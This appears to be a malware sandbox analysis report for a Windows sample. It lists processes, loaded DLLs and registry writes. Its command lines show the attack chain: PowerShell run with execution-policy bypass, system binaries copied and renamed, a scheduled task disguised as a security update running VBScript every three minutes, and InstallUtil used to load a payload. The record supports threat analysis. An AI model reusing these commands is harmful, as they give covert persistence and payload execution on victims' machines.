c:\users\admin\appdata\local\temp\winwsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\users\admin\appdata\local\temp\installutil.exe

PID
2968
CMD
powershell.exe -exec bypass -file C:\Users\admin\AppData\Local\Temp\s.ps1
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\msiltcfg.dll
c:\windows\system32\msi.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sxs.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\cmd.exe
c:\windows\system32\schtasks.exe
c:\windows\system32\netutils.dll

PID
2808
CMD
"C:\Users\admin\AppData\Local\Temp\InstallUtil.exe" /logfile= /u /LogToConsole=false "C:\Users\admin\AppData\Local\Temp\tmp_pFWwjd.dat"
Path
C:\Users\admin\AppData\Local\Temp\InstallUtil.exe
Indicators
Parent process
winwsh.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
.NET Framework installation utility
Version
2.0.50727.5420 (Win7SP1.050727-5400)
Modules
Image
c:\users\admin\appdata\local\temp\installutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\users\admin\appdata\local\temp\tmp_pfwwjd.dat
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.runtime.seri#\0728af1479c3388cadf85ccfc2b12582\system.runtime.serialization.formatters.soap.ni.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll

PID
636
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bai.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\psapi.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\msptls.dll

PID
2776
CMD
"C:\Windows\system32\cmd.exe" /c copy /y C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe C:\Users\admin\AppData\Local\Temp\InstallUtil.exe
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2588
CMD
"C:\Windows\system32\cmd.exe" /c copy /y C:\Windows\system32\wscript.exe C:\Users\admin\AppData\Local\Temp\winwsh.exe
Path
C:\Windows\system32\cmd.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
884
CMD
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 3 /tn "Security Script kb00769670" /tr "C:\Users\admin\AppData\Local\Temp\winwsh.exe //Nologo //E:vbscript //B C:\Users\admin\AppData\Local\Temp\Win629052.txt" /F
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
3512
CMD
"C:\Windows\system32\schtasks.exe" /run /tn "Security Script kb00769670"
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll

PID
2196
CMD
C:\Users\admin\AppData\Local\Temp\winwsh.exe //Nologo //E:vbscript //B C:\Users\admin\AppData\Local\Temp\Win629052.txt
Path
C:\Users\admin\AppData\Local\Temp\winwsh.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\users\admin\appdata\local\temp\winwsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\users\admin\appdata\local\temp\installutil.exe

PID
3516
CMD
"C:\Users\admin\AppData\Local\Temp\InstallUtil.exe" /logfile= /u /LogToConsole=false "C:\Users\admin\AppData\Local\Temp\tmp_pFWwjd.dat"
Path
C:\Users\admin\AppData\Local\Temp\InstallUtil.exe
Indicators
No indicators
Parent process
winwsh.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
.NET Framework installation utility
Version
2.0.50727.5420 (Win7SP1.050727-5400)
Modules
Image
c:\users\admin\appdata\local\temp\installutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\users\admin\appdata\local\temp\tmp_pfwwjd.dat
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.runtime.seri#\0728af1479c3388cadf85ccfc2b12582\system.runtime.serialization.formatters.soap.ni.dll

PID
3416
CMD
C:\Users\admin\AppData\Local\Temp\winwsh.exe //Nologo //E:vbscript //B C:\Users\admin\AppData\Local\Temp\Win629052.txt
Path
C:\Users\admin\AppData\Local\Temp\winwsh.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\users\admin\appdata\local\temp\winwsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\users\admin\appdata\local\temp\installutil.exe

PID
2668
CMD
"C:\Users\admin\AppData\Local\Temp\InstallUtil.exe" /logfile= /u /LogToConsole=false "C:\Users\admin\AppData\Local\Temp\tmp_pFWwjd.dat"
Path
C:\Users\admin\AppData\Local\Temp\InstallUtil.exe
Indicators
No indicators
Parent process
winwsh.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
.NET Framework installation utility
Version
2.0.50727.5420 (Win7SP1.050727-5400)
Modules
Image
c:\users\admin\appdata\local\temp\installutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\users\admin\appdata\local\temp\tmp_pfwwjd.dat
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.runtime.seri#\0728af1479c3388cadf85ccfc2b12582\system.runtime.serialization.formatters.soap.ni.dll

Registry activity

Total events
3633
Read events
3144
Write events
486
Delete events
3

Modification events

PID
Process
Operation
Key
Name
Value
2908
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2908
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831838
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
*8(
2A3828000C0E0000010000000000000000000000
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831839
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831952
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831953
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
0C0E00002E6BA4BF74DAD40100000000
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
y:(
793A28000C0E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3596
WINWORD.EXE
write
